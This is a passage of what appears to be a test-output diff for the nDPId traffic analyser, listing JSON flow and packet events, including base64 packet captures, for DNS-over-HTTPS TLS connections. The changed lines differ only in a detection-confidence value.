dXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORcVLi9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5rcL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/IDh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMhaAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyRJffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R06OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3Cr0\/J9vWUZrGJ